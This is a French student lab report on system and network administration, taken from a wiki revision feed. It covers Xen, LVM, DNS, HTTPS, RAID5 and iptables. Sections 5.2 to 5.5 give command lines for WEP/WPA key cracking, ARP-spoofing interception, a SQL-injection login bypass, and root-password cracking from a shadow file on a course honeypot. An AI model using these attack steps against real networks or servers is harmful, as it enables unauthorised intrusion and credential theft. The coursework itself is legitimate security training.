'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
 docker_apt_repository: deb [arch=amd64] https://download.docker.com/linux/debian buster stable&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer l'installation (uniquement sur stropharia)&lt;br /&gt;
 ansible-playbook dockerplaybook&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55162</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=55162"/>
				<updated>2020-12-22T00:44:13Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Configuration du serveur de mail pour la vérification */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=****** --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
==Mise en place des partitions==&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après avoir monté et peuplé les partitions, on ajoute dans /etc/fstab&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
pour que le montage des partitions soit fait automatiquement à chaque démarrage.&lt;br /&gt;
&lt;br /&gt;
=4.1 Serveur SSH=&lt;br /&gt;
&lt;br /&gt;
Afin de rendre accessible notre VM par SSH, nous décommentons la ligne&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
du fichier sshd-config. On restart ensuite le service pour prendre en comte la modification avec la commande&lt;br /&gt;
 sytemctl restart sshd&lt;br /&gt;
On test la connection :&lt;br /&gt;
 $ ssh root@ns1.stropharia.site&lt;br /&gt;
 root@ns1.stropharia.site's password:&lt;br /&gt;
La connection ssh fonctionne donc.&lt;br /&gt;
Update : On peut aussi se connecter en avec&lt;br /&gt;
 ssh root@www.stropharia.site&lt;br /&gt;
&lt;br /&gt;
=4.2 Serveur DNS=&lt;br /&gt;
Nous configurons d'abord nos paramètres DNS dans gandi avant de confgurer la VM. &lt;br /&gt;
&lt;br /&gt;
Dans Glue Records nous ajoutons le namespace et son IP : ns1.stropharia.site / 193.48.57.178&lt;br /&gt;
Dans Name Server nous ajoutons ce DNS et le secondaire :&lt;br /&gt;
ns1.stropharia.site | ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser l'implémentation open-source de DNS bind pour créer une association entre notre nom de domaine et l'IP de notre VM. &lt;br /&gt;
&lt;br /&gt;
On commence par créer le fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-ksk.key&lt;br /&gt;
 $include /etc/bind/stropharia.site.dnssec/stropharia.site-zsk.key&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.stropharia.site. root.stropharia.site. (&lt;br /&gt;
                              13         ; Serial&lt;br /&gt;
                            3600         ; Refresh [1h]&lt;br /&gt;
                             600         ; Retry [10mn]&lt;br /&gt;
                           86400         ; Expire [1d]&lt;br /&gt;
                             600 )       ; Negative Cache TTL [1h]&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.stropharia.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
 ns1     IN      A       193.48.57.178&lt;br /&gt;
 www     IN      A       193.48.57.178&lt;br /&gt;
 ns1     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
 www     IN      AAAA    2001:660:4401:60b2:216:3eff:fefb:8339&lt;br /&gt;
&lt;br /&gt;
Les parties mail et ipv6 font partie de la suite du TP, mais on peut voir les différents TTL pour le SOA (Start of Authority) ainsi que notre notre serveur de nom et l'adresse de l'hote.&lt;br /&gt;
&lt;br /&gt;
Afin d'avoir une trace personnelle, un record dans le fichier de zone à la forme suivante :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Format: !! host label!! ttl !! record class !! record type !! record data&lt;br /&gt;
|-&lt;br /&gt;
| Example:&lt;br /&gt;
| example.com&lt;br /&gt;
| 60&lt;br /&gt;
| IN&lt;br /&gt;
| A&lt;br /&gt;
| 104.255.228.125&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Et les différentes record types sont :&lt;br /&gt;
* A (Host address)&lt;br /&gt;
* AAAA (IPv6 host address)&lt;br /&gt;
* ALIAS (Auto resolved alias)&lt;br /&gt;
* CNAME (Canonical name for an alias)&lt;br /&gt;
* MX (Mail eXchange)&lt;br /&gt;
* NS (Name Server)&lt;br /&gt;
* PTR (Pointer)&lt;br /&gt;
* SOA (Start Of Authority)&lt;br /&gt;
* SRV (location of service)&lt;br /&gt;
* TXT (Descriptive text)&lt;br /&gt;
&lt;br /&gt;
On ajoute maintenant la zone dans le fichier /etc/bind/named.conf.local :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;stropharia.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.stropharia.site.signed&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
(On utilise le fichier signé pour sécuriser l'accès https, fait par la suite)&lt;br /&gt;
&lt;br /&gt;
On modifie également le fichier named.conf.options :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
         dnssec-enable yes;&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Afin d'autoriser le transfert des informations au DNS secondaire 217.70.177.40.&lt;br /&gt;
&lt;br /&gt;
On test alors la configuration :&lt;br /&gt;
 # host -t any stropharia.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases:&lt;br /&gt;
 stropharia.site mail is handled by 42 &lt;br /&gt;
 ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns1.stropharia.site.&lt;br /&gt;
 stropharia.site name server ns6.gandi.net.&lt;br /&gt;
 stropharia.site has SOA record ns1.stropharia.site. &lt;br /&gt;
 root.stropharia.site. 13 3600 600 86400 600&lt;br /&gt;
&lt;br /&gt;
On conclue que le DNS est fonctionne correctement.&lt;br /&gt;
&lt;br /&gt;
=4.3  Sécurisation de site web par certificat=&lt;br /&gt;
&lt;br /&gt;
Cette section décrit les étapes nécéssaire à la sécurisation par un accès https.&lt;br /&gt;
&lt;br /&gt;
Le résultat est le suivant : &lt;br /&gt;
[[Fichier:https_stropharia.png|400px]]&lt;br /&gt;
&lt;br /&gt;
==Procedure==&lt;br /&gt;
Dans cette partie nous suivons la procédure détaillée de gandi : https://docs.gandi.net/fr/ssl/operations_courantes/csr.html.&lt;br /&gt;
&lt;br /&gt;
Celle-ci consiste à générer les clés avec la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout stropharia.site.key -out stropharia.site.csr&lt;br /&gt;
&lt;br /&gt;
Et de demander à gandi de signer le certificat .csr afin d'obtenir le .crt. On note que le prix annoncé de 12€ passe à 0€ lors du paiement si c'est le premier.&lt;br /&gt;
&lt;br /&gt;
Avant de délivrer le certificat signé gandi doit vérifier que nous possédons bien le nom de domaine. Pour cela une des méthodes possibles est d'envoyer un mail à admin@stropharia.site.&lt;br /&gt;
&lt;br /&gt;
==Configuration du serveur de mail pour la vérification==&lt;br /&gt;
&lt;br /&gt;
Nous utilisons le programme postfix pour la récupération des mails.&lt;br /&gt;
&lt;br /&gt;
Après l'avoir installé nous ajoutons un un alias entre l'utilisateur admin et root afin de recevoir le mail de gandi sur un utilisateur existant.&lt;br /&gt;
&lt;br /&gt;
 #vi /etc/aliases&lt;br /&gt;
 # See man 5 aliases for format&lt;br /&gt;
 postmaster:    root&lt;br /&gt;
 admin:    root&lt;br /&gt;
&lt;br /&gt;
Afin de recevoir les mails nous ajoutons aussi la ligne suivante au fichier /etc/bind/db.stropharia.site&lt;br /&gt;
 @       IN      MX      42 ns1&lt;br /&gt;
&lt;br /&gt;
Pour l'agent de courriel nous utilsons Bsd-mailx :&lt;br /&gt;
 apt-get install -y bsd-mailx #install mailx&lt;br /&gt;
 postalias /etc/aliases # met à jour la base des alias pour prendre en compte admin:root&lt;br /&gt;
 mailx #lancement de la commande pour voir les mails recus&lt;br /&gt;
&lt;br /&gt;
On clique ensuite sur le lien et gandi et entrons le mot de passe de vérification reçu. Peut après on peut télécharger notre .crt ainsi que le fichier GandiStandardSSLCA2.pem.&lt;br /&gt;
&lt;br /&gt;
Finalement on place ces fichiers à coté de notre clé privée dans le répertoire /etc/ssl&lt;br /&gt;
 #ls /etc/ssl | less&lt;br /&gt;
 GandiStandardSSLCA2.pem&lt;br /&gt;
 certs&lt;br /&gt;
 openssl.cnf&lt;br /&gt;
 private&lt;br /&gt;
 stropharia.site.crt&lt;br /&gt;
 stropharia.site.key&lt;br /&gt;
&lt;br /&gt;
==Configuration d'apache2==&lt;br /&gt;
Une fois le CSR signé nous devons configurer apache 2 pour gérer du HTTPS sur le port 443.&lt;br /&gt;
&lt;br /&gt;
On commence par l'installer :&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
puis on active le module ssl :&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le fichier /etc/apache2/sites-enabled/000-default.conf pour rediriger le traffic http du port 80 vers le port 443 :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerName www.stropharia.site&lt;br /&gt;
         '''Redirect / https://www.stropharia.site'''&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/html&lt;br /&gt;
         ...&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et configurer les mots clés SSLCertificateKeyFile, SSLCertificateFile et SSLCertificateChainFile pour la connection sécurisé selon l'énoncé :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost _default_:443&amp;gt;                                                     &lt;br /&gt;
   ServerName www.stropharia.site                                                &lt;br /&gt;
   DocumentRoot /var/www/html                                                    &lt;br /&gt;
   SSLEngine On                                                                  &lt;br /&gt;
   SSLCertificateFile /etc/ssl/stropharia.site.crt                               &lt;br /&gt;
   SSLCertificateKeyFile /etc/ssl/stropharia.site.key                            &lt;br /&gt;
   SSLCertificateChainFile &lt;br /&gt;
/etc/ssl/GandiStandardSSLCA2.pem                      &lt;br /&gt;
   SSLVerifyClient None                                                          &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crackwpagrp11.jpg|600px]]&lt;br /&gt;
&lt;br /&gt;
=5.4 Attaque &amp;quot;homme au milieu&amp;quot;=&lt;br /&gt;
&lt;br /&gt;
Commande afin de voir les paquets entre la machine et le routeur&lt;br /&gt;
 arpspoof -i eth0 -t 172.26.145.57 172.26.145.254 &lt;br /&gt;
&lt;br /&gt;
Ensuite, on peut visualiser les paquets reçu avec wireshark.&lt;br /&gt;
&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=6.1 Installation Raid5=&lt;br /&gt;
&lt;br /&gt;
Création des partitions sur capbreton&lt;br /&gt;
 lvcreate -LG -n stropharia-part1 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part2 virtual&lt;br /&gt;
 lvcreate -LG -n stropharia-part3 virtual&lt;br /&gt;
&lt;br /&gt;
Modification du fichier stropharia.cfg&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part1,xvda5,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part2,xvda6,w'&lt;br /&gt;
 'phy:/dev/virtual/stropharia-part3,xvda7,w'&lt;br /&gt;
&lt;br /&gt;
On recrée notre VM&lt;br /&gt;
 xl destroy stropharia&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
Création des volumes et formatage&lt;br /&gt;
 mdadm --create --verbose /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
 mkds -t ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Mount des partitions&lt;br /&gt;
 mount /dev/md0 /mnt&lt;br /&gt;
&lt;br /&gt;
Nous pouvons donc maintenant perdre un disque en gardant les données de la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
=7.1 Architecture de la ferme= &lt;br /&gt;
&lt;br /&gt;
Création d'un bridge dans les paramètres de la machine virtuelle stropharia.&lt;br /&gt;
&lt;br /&gt;
Ajout d'une interface dans les 2 VM en modifiant /etc/network/interfaces.&lt;br /&gt;
&lt;br /&gt;
Ajout de la mascarade&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.42.25 &lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.42.25 &lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -s 192.168.42.25  --to 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Création de la clef publique et commande pour la transmettre aux VM.&lt;br /&gt;
&lt;br /&gt;
 cat ~/.ssh/id_rsa.pub | ssh username@remote_host &amp;quot;mkdir -p ~/.ssh &amp;amp;&amp;amp; cat &amp;gt;&amp;gt; ~/.ssh/authorized_keys&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Rôle motd (adriagalin.motd)&lt;br /&gt;
 ansible-galaxy install adriagalin.motd&lt;br /&gt;
&lt;br /&gt;
=7.2 Installation de docker= &lt;br /&gt;
Installation du rôle geerlingguy.docker&lt;br /&gt;
 ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Pour adapter le rôle à debian buster, il faut modifier les variables suivantes dans le playbook:&lt;br /&gt;
 docker_apt_gpg_key: https://download.docker.com/linux/debian/gpg&lt;br /&gt;
